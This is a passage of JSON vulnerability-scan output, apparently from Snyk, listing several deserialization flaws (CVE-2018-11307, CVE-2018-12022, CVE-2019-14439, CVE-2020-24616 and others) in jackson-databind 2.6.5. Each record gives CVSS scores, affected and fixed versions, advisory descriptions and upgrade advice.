- "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": 
"2020-06-15T15:45:37Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.565244Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-6056407", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.9.0,2.9.9.2)", - "[2.8.0,2.8.11.4)", - "[,2.7.9.6)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.9.9.2", - "2.8.11.4", - "2.7.9.6" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2", - "title": "GitHub Comparison" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2387", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2389", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2395", - "title": "GitHub Issue" - }, - { - "url": "https://snyk.io/blog/jackson-deserialization-vulnerability/", - "title": "Snyk Blog" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:47:46.065762Z" - }, - { - "assigner": "Red Hat", - "severity": 
"high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:48:35.581531Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:09:40.009523Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:46.065762Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:35.581531Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. `SubTypeValidator.java` mishandles default typing when `ehcache` is used, leading to remote code execution.\n\n\n **NOTE:** This vulnerability has also been identified as: [CVE-2019-14379](https://security.snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-455617)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.2, 2.8.11.4, 2.7.9.6 or higher.\n## References\n- [GitHub Comparison](https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2387)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2389)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2395)\n- [Snyk Blog](https://snyk.io/blog/jackson-deserialization-vulnerability/)\n", - "epssDetails": { - "percentile": "0.45827", - "probability": "0.00116", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-14439" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-6fpp-rgj9-8rwc", - "GHSA-gwp4-hfv6-p7hw" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2023-11-14T13:41:26.478840Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2019-07-29T12:40:42Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": 
"com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-07-29T12:40:42Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:48:35.581531Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-608664", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "credit": [ - "Tatu Saloranta" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.6)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.6.7.4", - "2.9.10.6" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.9.4,2.9.10.6)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/jsontype/impl/SubTypeValidator.java", - "className": "SubTypeValidator", - "functionName": "validateSubType" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2814", - "title": "GitHub Issue" - }, - { - "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - }, - { - "url": "https://github.com/Kamimuka/cve-2020-24616-poc", - "title": "PoC" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": 
"2024-03-11T09:48:13.383929Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:50:47.311633Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:04:03.282990Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:13.383929Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:47.311633Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `br.com.anteros.dbcp.AnterosDBCPDataSource` (aka Anteros-DBCP).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). 
It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. 
By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.6 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2814)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Kamimuka/cve-2020-24616-poc)\n", - "epssDetails": { - "percentile": "0.85138", - "probability": "0.01172", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-24616" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-08-26T11:28:06.617646Z", - "functions_new": [ - { - "version": [ - "[2.9.4,2.9.10.6)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.jsontype.impl.SubTypeValidator", - "functionName": "validateSubType" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-08-26T11:26:14Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-08-26T14:27:29Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:50:47.311633Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - 
"upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72445", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.3)", - "[2.7.0,2.7.9.4)", - "[2.8.0,2.8.11.2)", - "[2.9.0,2.9.6)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.3", - "2.7.9.4", - "2.8.11.2", - "2.9.6" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.7.9.4)", - "[2.8.0,2.8.11.2)", - "[2.9.0,2.9.6)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/7487cf7eb14be2f65a1eb108e8629c07ef45e0a1", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2052", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 7.3, - "modificationTime": "2024-03-11T09:48:41.204259Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:36.643590Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": 
"2024-03-06T13:58:45.496040Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:41.204259Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:36.643590Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attack, if the user is handling untrusted content or using the `Default Typing` feature. an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-12022`) is not identical to `CVE-2018-12018`,`CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14723` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.4, 2.8.11.2, 2.9.6 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/7487cf7eb14be2f65a1eb108e8629c07ef45e0a1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2052)\n", - "epssDetails": { - "percentile": "0.81303", - "probability": "0.00770", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-12022" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-cjjf-94ff-43w7", - "GHSA-wrr7-33fx-rcvj" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2018-10-11T17:11:34.234921Z", - "functions_new": [ - { - "version": [ - "[,2.7.9.4)", - "[2.8.0,2.8.11.2)", - "[2.9.0,2.9.6)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-05-29T17:00:04Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2018-10-11T17:00:03Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:36.643590Z", - "socialTrendAlert": false, - 
"severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72446", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.3)", - "[2.7.0,2.7.9.4)", - "[2.8.0,2.8.11.2)", - "[2.9.0,2.9.5)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.3", - "2.7.9.4", - "2.8.11.2", - "2.9.5" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.7.9.4)", - "[2.8.0, 2.8.11.2)", - "[2.9.0, 2.9.6)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/27b4defc270454dea6842bd9279f17387eceb737", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2032", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 5.6, - "modificationTime": "2024-03-11T09:47:14.962980Z" - }, - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:47:26.624837Z" - } - ], - "cvssSources": [ 
- { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:53.818908Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 5.6, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:47:14.962980Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:26.624837Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It may allow content exfiltration (remote access by sending contents over ftp) when untrusted content is deserialized with default typing enabled. This vulnerability is due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-11307`) is not identical to `CVE-2018-12018`,`CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722` and `CVE-2018-14723`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.4, 2.8.11.2, 2.9.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/27b4defc270454dea6842bd9279f17387eceb737)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2032)\n", - "epssDetails": { - "percentile": "0.85803", - "probability": "0.01278", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-11307" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-qr7j-h6gg-jmgc" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2018-10-11T17:14:00.916831Z", - "functions_new": [ - { - "version": [ - "[,2.7.9.4)", - "[2.8.0, 2.8.11.2)", - "[2.9.0, 2.9.6)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-05-10T17:10:58Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": 
"jackson-databind" - }, - "publicationTime": "2018-10-11T17:10:50Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:47:26.624837Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72447", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.3)", - "[2.7.0,2.7.9.4)", - "[2.8.0,2.8.11.2)", - "[2.9.0,2.9.6)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.3", - "2.7.9.4", - "2.8.11.2", - "2.9.6" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.7.9.4)", - "[2.8.0,2.8.11.2)", - "[2.9.0,2.9.6)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": 